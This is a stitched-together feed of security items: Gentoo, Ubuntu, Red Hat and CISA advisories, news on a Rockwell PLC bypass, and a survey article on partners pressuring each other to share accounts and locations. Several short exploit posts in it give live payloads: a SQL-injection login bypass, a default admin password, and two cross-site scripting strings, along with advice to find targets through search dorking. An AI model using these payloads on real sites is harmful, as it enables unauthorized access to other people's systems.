Gentoo Linux Security Advisory 202408-1 - Multiple vulnerabilities have been discovered in containerd, the worst of which could lead to privilege escalation. Versions greater than or equal to 1.6.19 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202408-01  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: High  
    Title: containerd: Multiple Vulnerabilities  
     Date: August 06, 2024  
     Bugs: #897960  
       ID: 202408-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
========

Multiple vulnerabilities have been discovered in containerd, the worst  
of which could lead to privilege escalation.

Background  
==========

containerd is a daemon with an API and a command line client, to manage  
containers on one machine. It uses runC to run containers according to  
the OCI specification.

Affected packages  
=================

Package                    Vulnerable    Unaffected  
-------------------------  ------------  ------------  
app-containers/containerd  < 1.6.19      >= 1.6.19

Description  
===========

Multiple vulnerabilities have been discovered in containerd. Please  
review the CVE identifiers referenced below for details.

Impact  
======

Please review the referenced CVE identifiers for details.

Workaround  
==========

There is no known workaround at this time.

Resolution  
==========

All containerd users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=app-containers/containerd-1.6.19"

References  
==========

[ 1 ] CVE-2023-25153  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25153  
[ 2 ] CVE-2023-25173  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25173

Availability  
============

This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202408-01

Concerns?  
=========

Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
=======

Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202408-01

Concert Ticket Reservation System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ======================================================================================================================================================| # Title     : Concert Ticket Reservation System v1.0 Auth By Pass Vulnerability                                                                    || # Author    : indoushka                                                                                                                            || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)                                                                     || # Vendor    : https://download-media.code-projects.org/2020/04/Concert_Ticket_Ordering_System__IN_PHP_CSS_JavaScript_AND_MYSQL__FREE_DOWNLOAD.zip  |======================================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/ConcertTicketReservationSystem-master/profile.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Concert Ticket Reservation System 1.0 SQL Injection

Computer Laboratory Management System version 1.0 suffers from an ignored default credential vulnerability.

**Computer Laboratory Management System 1.0 Insecure Settings**

Posted Aug 6, 2024

Authored by indoushka

Computer Laboratory Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 903fb54e0bd8fb8efe43fdddb49a0f5abaa23ea96b8495e4f7c47b36636f9f0d

Download | Favorite | View

**Computer Laboratory Management System 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : Computer Laboratory Management System v1.0 Insecure Settings Vulnerability                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yorubanwitness000webhostappcom/admin/Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,255)
*   Arbitrary (16,849)
*   BBS (2,859)
*   Bypass (1,860)
*   CGI (1,033)
*   Code Execution (7,786)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,385)
*   DoS (25,039)
*   Encryption (2,389)
*   Exploit (53,128)
*   File Inclusion (4,258)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,888)
*   Intrusion Detection (915)
*   Java (3,142)
*   JavaScript (896)
*   Kernel (7,188)
*   Local (14,791)
*   Magazine (586)
*   Overflow (13,166)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,632)
*   Remote (31,643)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,025)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,604)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,932)
*   Web (9,955)
*   Whitepaper (3,782)
*   x86 (967)
*   XSS (18,246)
*   Other

**File Archives**

*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,087)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,536)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,612)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,441)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,727)
*   UNIX (9,433)
*   UnixWare (187)
*   Windows (6,668)
*   Other

Computer Laboratory Management System 1.0 Insecure Settings

Ubuntu Security Notice 6200-2 - USN-6200-1 fixed vulnerabilities in ImageMagick. Unfortunately these fixes were incomplete for Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. This update fixes the problem.

==========================================================================  
Ubuntu Security Notice USN-6200-2  
July 25, 2024

imagemagick vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS

Summary:

Several security issues were fixed in ImageMagick.

Software Description:  
- imagemagick: Image manipulation programs and library

Details:

USN-6200-1 fixed vulnerabilities in ImageMagick. Unfortunately these fixes were  
incomplete for Ubuntu 20.04 LTS, and Ubuntu 22.04 LTS. This update fixes the  
problem.

Original advisory details:

 It was discovered that ImageMagick incorrectly handled the "-authenticate"  
 option for password-protected PDF files. An attacker could possibly use  
 this issue to inject additional shell commands and perform arbitrary code  
 execution. This issue only affected Ubuntu 20.04 LTS. (CVE-2020-29599)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing PDF files. If a user or automated system using ImageMagick  
 were tricked into opening a specially crafted PDF file, an attacker could  
 exploit this to cause a denial of service. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2021-20224)

  Zhang Xiaohui discovered that ImageMagick incorrectly handled certain  
 values when processing image data. If a user or automated system using  
 ImageMagick were tricked into opening a specially crafted image, an  
 attacker could exploit this to cause a denial of service. This issue only  
 affected Ubuntu 20.04 LTS. (CVE-2021-20241, CVE-2021-20243)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing visual effects based image files. By tricking a user into  
 opening a specially crafted image file, an attacker could crash the  
 application causing a denial of service. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2021-20244, CVE-2021-20309)

  It was discovered that ImageMagick incorrectly handled certain values  
 when performing resampling operations. By tricking a user into opening  
 a specially crafted image file, an attacker could crash the application  
 causing a denial of service. This issue only affected Ubuntu 20.04 LTS.  
 (CVE-2021-20246)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing thumbnail image data. By tricking a user into opening  
 a specially crafted image file, an attacker could crash the application  
 causing a denial of service. This issue only affected Ubuntu 20.04 LTS.  
 (CVE-2021-20312)

  It was discovered that ImageMagick incorrectly handled memory cleanup  
 when performing certain cryptographic operations. Under certain conditions  
 sensitive cryptographic information could be disclosed. This issue only  
 affected Ubuntu 20.04 LTS. (CVE-2021-20313)

  It was discovered that ImageMagick did not use the correct rights when  
 specifically excluded by a module policy. An attacker could use this issue  
 to read and write certain restricted files. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2021-39212)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 image file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. This issue only affected Ubuntu  
 20.04 LTS. (CVE-2022-28463, CVE-2022-32545, CVE-2022-32546, CVE-2022-32547)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 image file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. This issue only affected Ubuntu  
 22.04 LTS, Ubuntu 22.10, and Ubuntu 23.04. (CVE-2021-3610, CVE-2023-1906,  
 CVE-2023-3428)

  It was discovered that ImageMagick incorrectly handled certain values  
 when processing specially crafted SVG files. By tricking a user into  
 opening a specially crafted SVG file, an attacker could crash the  
 application causing a denial of service. This issue only affected Ubuntu  
 20.04 LTS, Ubuntu 22.04 LTS, Ubuntu 22.10, and Ubuntu 23.04. (CVE-2023-1289)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 tiff file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. This issue only affected Ubuntu  
 22.04 LTS, Ubuntu 22.10, and Ubuntu 23.04. (CVE-2023-3195)

  It was discovered that ImageMagick incorrectly handled memory under certain  
 circumstances. If a user were tricked into opening a specially crafted  
 image file, an attacker could possibly exploit this issue to cause a denial  
 of service or other unspecified impact. (CVE-2023-34151)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.04 LTS  
  imagemagick                     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-6-common            8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-6.q16               8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-6.q16hdri           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  imagemagick-common              8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libimage-magick-perl            8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libimage-magick-q16-perl        8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libimage-magick-q16hdri-perl    8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6-headers           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16-8             8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16-dev           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16hdri-8         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-6.q16hdri-dev       8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagick++-dev                 8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6-headers         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16-6           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16-dev         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16hdri-6       8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-6.q16hdri-dev     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickcore-dev               8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6-headers         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16-6           8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16-dev         8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16hdri-6       8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-6.q16hdri-dev     8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  libmagickwand-dev               8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  perlmagick                      8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5

Ubuntu 20.04 LTS  
  imagemagick                     8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-6-common            8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-6.q16               8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-6.q16hdri           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  imagemagick-common              8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libimage-magick-perl            8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libimage-magick-q16-perl        8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libimage-magick-q16hdri-perl    8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6-headers           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16-8             8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16-dev           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16hdri-8         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-6.q16hdri-dev       8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagick++-dev                 8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6-headers         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16-6           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16-dev         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16hdri-6       8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-6.q16hdri-dev     8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickcore-dev               8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6-headers         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16-6           8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16-dev         8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16hdri-6       8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-6.q16hdri-dev     8:6.9.10.23+dfsg-2.1ubuntu11.10  
  libmagickwand-dev               8:6.9.10.23+dfsg-2.1ubuntu11.10  
  perlmagick                      8:6.9.10.23+dfsg-2.1ubuntu11.10

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6200-2  
  https://ubuntu.com/security/notices/USN-6200-1  
  CVE-2023-1289, CVE-2023-34151

Package Information:  
  https://launchpad.net/ubuntu/+source/imagemagick/8:6.9.11.60+dfsg-1.3ubuntu0.22.04.5  
  https://launchpad.net/ubuntu/+source/imagemagick/8:6.9.10.23+dfsg-2.1ubuntu11.10

Ubuntu Security Notice USN-6200-2

Codeprojects E-Commerce version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Codeprojects E-Commerce v1.0 XSS Vulnerability                                                                              || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://code-projects.org/?s=Ecommerce                                                                                      |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : admin/includes/profile_modal.php/"onmouseover%3d'prompt(938260)'bad%3d"[+] https://www/127.0.0.1/demo/comdept.cmru.ac.th/59143214/admin/includes/profile_modal.php/"onmouseover%3d'prompt(938260)'bad%3d"Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Codeprojects E-Commerce 1.0 Cross Site Scripting

Blog Site version 1.0 suffers from a cross site scripting vulnerability.

    =============================================================================================================================================| # Title     : Blog Site 1.0 XSS Vulnerability                                                                                             || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/blog-site-using-php_0.zip                             |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : After LOgin index.php?id=&page=http://testaspvulnweb.com/t/xss.html%3f%2500.jpg[+] Panel : http://127.0.0.1/blog/admin/index.php?id=&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpgGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

Blog Site 1.0 Cross Site Scripting 

Red Hat Security Advisory 2024-5001-03 - An update for httpd is now available for Red Hat Enterprise Linux 9.2 Extended Update Support. Issues addressed include a server-side request forgery vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_5001.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: httpd security updateAdvisory ID:        RHSA-2024:5001-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:5001Issue date:         2024-08-06Revision:           03CVE Names:          CVE-2024-38473====================================================================Summary: An update for httpd is now available for Red Hat Enterprise Linux 9.2 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: Encoding problem in mod_proxy (CVE-2024-38473)* httpd: Potential SSRF in mod_rewrite (CVE-2024-39573)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38473References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2295012https://bugzilla.redhat.com/show_bug.cgi?id=2295022

Red Hat Security Advisory 2024-5001-03

A security vulnerability in Rockwell Automation's ControlLogix 1756 programmable logic controllers, tracked as CVE-2024-6242, could allow tampering with physical processes at plants.

Source: Kay Roxby via Alamy Stock Photo

A security bypass vulnerability in Rockwell Automation ControlLogix 1756 devices could open critical infrastructure to cyberattacks on the operational technology (OT) that controls physical processes.

According to Claroty's Team82, the bug (CVE-2024-6242, CVSS 8.4), could allow a remote attacker with network access to the device to send elevated commands to the CPU of a programmable logic controller (PLC), from an untrusted chassis card.

"Our technique allowed us to bypass the trusted slot feature implemented by Rockwell that enforces security policies and allows the controller to deny communication via untrusted paths on the local chassis," Claroty researcher Sharon Brizinov explained in a blog posting on the bug.

The result? Successful attackers can download new logic for controlling a PLC's behavior, and send other elevated commands that would interfere with the physical operations of a manufacturing site.

Rockwell has issued a fix, and users are urged to apply it immediately; and the Cybersecurity and Infrastructure Security Agency has published mitigation advice, noting that exploitation is a low-complexity endeavor.

According to Rockwell, ControlLogix, GuardLogix, and 1756 ControlLogix I/O Modules, widely deployed in industrial manufacturing environments, are affected by the vulnerability.

**Manipulating the Trusted Slot Mechanism**

The 1756 chassis is a modular enclosure that houses various cards within physical slots that are responsible for communicating with sensors, actuators, and other OT equipment; they also provide the physical and electrical connections to allow those components to interoperate and talk to each other. All of the communication and connections are carried out via a shared circuit board known as the backplane, using the common industrial protocol, or CIP.

"A 1756 PLC in a production line might be connected to multiple sources via different network cards, for example, the human-machine interface (HMI) panel, engineering workstation, and other devices," Brizinov explained. "To ensure that only specific individual devices are performing elevated operations on the PLC such as download logic, a security mechanism was introduced called trusted slot."

The trusted-slot feature ensures that only authorized slots can communicate with each other, protecting against potential tampering. It does this by requiring slots to essentially authenticate to the PLC.

However, Claroty found a way around that.

"Since all slots are connected via the backplane, and CIP supports path (routing), we could generate a CIP packet that will be routed through a trusted card before it reaches the CPU," according to the blog post. "Basically, the method involved 'jumping' between local backplane slots…This technique allowed us to traverse the security boundary that was meant to protect the CPU from untrusted cards."

To prevent the exposure of critical control systems to unauthorized access over the CIP protocol, site security administrators should apply Rockwell's patches immediately:

*   ControlLogix 5580 (1756-L8z): Update to versions V32.016, V33.015, V34.014, V35.011, and later.
    
*   GuardLogix 5580 (1756-L8zS): Update to versions V32.016, V33.015, V34.014, V35.011 and later.
    
*   1756-EN4TR: Update to versions V5.001 and later.
    
*   1756-EN2T Series D, 1756-EN2F Series C, 1756-EN2TR Series C, 1756-EN3TR Series B, and 1756-EN2TP Series A: Update to version V12.001 and later
    

**About the Author**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

Rockwell PLC Security Bypass Threatens Manufacturing Processes

Men face more pressure—and threats—from significant others to grant access to their personal devices, online accounts, and locations.

Men report facing more pressure than women—and more threats of retaliation—to grant access to their locations and online accounts when in a committed relationship, according to a new analysis of data released this summer by Malwarebytes.

The same analysis also revealed that, while men report more regret in sharing their locations, women report less awareness in how their locations can be accessed, particularly through food delivery apps, ride-hailing services, vacation rental platforms, and other location-based tools.

The data from Malwarebytes paints a nuanced portrait of the struggles that men and women face when deciding how much of their digital lives to share with spouses, boyfriends, girlfriends, and partners. Often, the struggles intersect with parts of modern dating that people have little control over, including how companies track, collect, and share their data, and how easy it is for other people to access that data.

In looking more closely at the research released earlier this year in the report, “What’s mine is yours: How couples share an all-access pass to their digital lives,” Malwarebytes hopes to once again spread awareness and education about secure dating practices in the internet age.

Access our full “Modern Love in the Digital Age” guidance hub below.

Men are going through a loneliness epidemic in America right now.

But even for men in romantic relationships, where companionship should be a salve, other problems emerge. In particular, as Malwarebytes found, these problems include disparate feelings of pressure and regret in sharing their devices, account passwords, and locations.

For example, of partners who shared their location with one another, 36% of men said they’d “felt pressure” to do so, compared with 20% of women who said the same. And a shocking 9% of men who share their account access clarified that such access may be imbalanced, as they agreed: “My partner has threatened me over sharing account access,” compared to 4% of women—a more than two-fold increase. The threats included things like being broken up with, being harmed physically or emotionally, or being shut out and ignored.  

Men were also more likely to report a one-sided consent model for how their partners accessed their devices, accounts, and locations (a model that we’re not entirely ready to call “sharing” because of the clearly communicated lack of consent).

When asked about the way in which they “shared” _any_ type of digital and device access, which included smartphones, tablets, computers, online accounts for multiple apps, and location data, 23% of men said “Yes \[my partner\] has access but I wish they didn’t.” That rate was 12% for women.

Similar disparities arose when men and women answered the same way regarding device access (14% of men compared to 7% of women), social media access (9% of men compared to 4% of women), and access to apps that can share your location (16% of men compared to 9% of women).

But not all location apps are the same, and when asked specifically about apps that are designed to share locations between individuals—such as FindMy on iOS, Find My Device for Google, or third-party tools like Life360—the data revealed the largest discrepancy.

A shocking 400% more men said they only share their locations through those apps “because my partner insists” (8% of men compared with 2% of women).

In the research, men openly shared their feelings on all this, as 14% (compared to 8% of women) agreed: “If I could do it all over again, I wouldn’t share as much personal account information with my partner.”  

In safe and consensual arrangements between couples, a shared location can show up as a little blue dot on a devoted smartphone app.

But for apps that rely on location data to function—like ride-hailing apps, food delivery services, and vacation rental platforms—location “sharing” can feel a lot more like location “leaking.” A shared Airbnb account, for example, could reveal a spouse’s active vacation rental address to another partner logged into the same account. A shared Uber account could reveal ride history, and potentially even a new address, to an ex-boyfriend who never logged out after a breakup. And DoorDash orders could expose when a domestic abuse survivor is at home, so long as their abuser is monitoring the app from the same account.

But these examples, research shows, are not common knowledge, with women showing less awareness than men for every type of account.

Women were less likely to be aware of how their locations could be exposed to another user logged into the same account for vacation rental platforms (68% of women were unaware compared to 49% of men), health and fitness tracking apps like FitBit and Strava (57% of women compared to 43% of men), ride-hailing apps (50% of women compared to 37% of men), and food and grocery delivery apps (49% of women compared to 39% of men).

Women were also more likely to say they were unaware of how the companion apps for many modern vehicles—which can be used to find a car in a large parking lot or to help locate a stolen sedan—can also reveal their location on a shared account (60% of women compared to 41% of men).

This relatively new location-tracking method has caused serious problems for spouses being followed by their exes, and the blame cannot fall on users who are tasked with, as usual, managing even more parts of their lives online.

****Shifting perspectives****

Data alone never presents a full story, and data that compares men and women can be vulnerable to misinterpretation.

The varying issues facing men and women should not be interpreted as problems of their own making—men cannot be said to regret sharing account access because they have “something to hide,” and women cannot be said to be poorer users of technology because of lower reported awareness in location sharing mechanisms.

If anything, the overlap in responses shows the work to be done.

When 68% of women _and_ 49% of men are unaware of how their locations can be accessed through shared accounts on vacation rental platforms, perhaps this isn’t a problem of user awareness. Perhaps it is a problem of unclear communication and lacking transparency from the largest and most popular apps today.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 Men report more pressure and threats to share location and accounts with partners, research shows 

View CSAF
1. EXECUTIVE SUMMARY
CVSS v4 8.5
ATTENTION: Low attack complexity
Vendor: Delta Electronics
Equipment: DIAScreen
Vulnerability: Stack-based Buffer Overflow
2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an attacker to cause a stack-based buffer overflow, resulting in execution of arbitrary code.
3. TECHNICAL DETAILS
3.1 AFFECTED PRODUCTS
The following versions of Delta Electronics DIAScreen visualization software are affected:
DIAScreen: Versions prior to 1.4.2
3.2 Vulnerability Overview
3.2.1 STACK-BASED BUFFER OVERFLOW CWE-121
A crafted DPA file could force Delta Electronics DIAScreen to overflow a stack-based buffer, which could allow an attacker to execute arbitrary code.
CVE-2024-7502 has been assigned to this vulnerability. A CVSS v3.1 base score of 7.8 has been calculated; the CVSS vector string is (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H).
A CVSS v4 score has also been calculated for CVE-2024-7502. A base score of 8.5 has been calculated; the CVSS vector string is (CVSS4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N).
3.3 BACKGROUND
CRITICAL INFRASTRUCTURE SECTORS: Energy
COUNTRIES/AREAS DEPLOYED: Worldwide
COMPANY HEADQUARTERS LOCATION: Taiwan
3.4 RESEARCHER
Natnael Samson (@NattiSamson) working with Trend Micro Zero Day Initiative reported this vulnerability to CISA.
4. MITIGATIONS
Delta Electronics has released v1.4.2 of DIAScreen and recommends users install this update on all affected systems.
CISA recommends users take defensive measures to minimize the risk of exploitation of this vulnerability, such as:
Minimize network exposure for all control system devices and/or systems, ensuring they are not accessible from the internet.
Locate control system networks and remote devices behind firewalls and isolating them from business networks.
When remote access is required, use more secure methods, such as Virtual Private Networks (VPNs), recognizing VPNs may have vulnerabilities and should be updated to the most current version available. Also recognize VPN is only as secure as the connected devices.
CISA reminds organizations to perform proper impact analysis and risk assessment prior to deploying defensive measures.
CISA also provides a section for control systems security recommended practices on the ICS webpage on cisa.gov/ics. Several CISA products detailing cyber defense best practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.
CISA encourages organizations to implement recommended cybersecurity strategies for proactive defense of ICS assets.
Additional mitigation guidance and recommended practices are publicly available on the ICS webpage at cisa.gov/ics in the technical information paper, ICS-TIP-12-146-01B--Targeted Cyber Intrusion Detection and Mitigation Strategies.
Organizations observing suspected malicious activity should follow established internal procedures and report findings to CISA for tracking and correlation against other incidents.
No known public exploitation specifically targeting this vulnerability has been reported to CISA at this time. This vulnerability is not exploitable remotely.
5. UPDATE HISTORY
August 6, 2024: Initial Publication

Latest News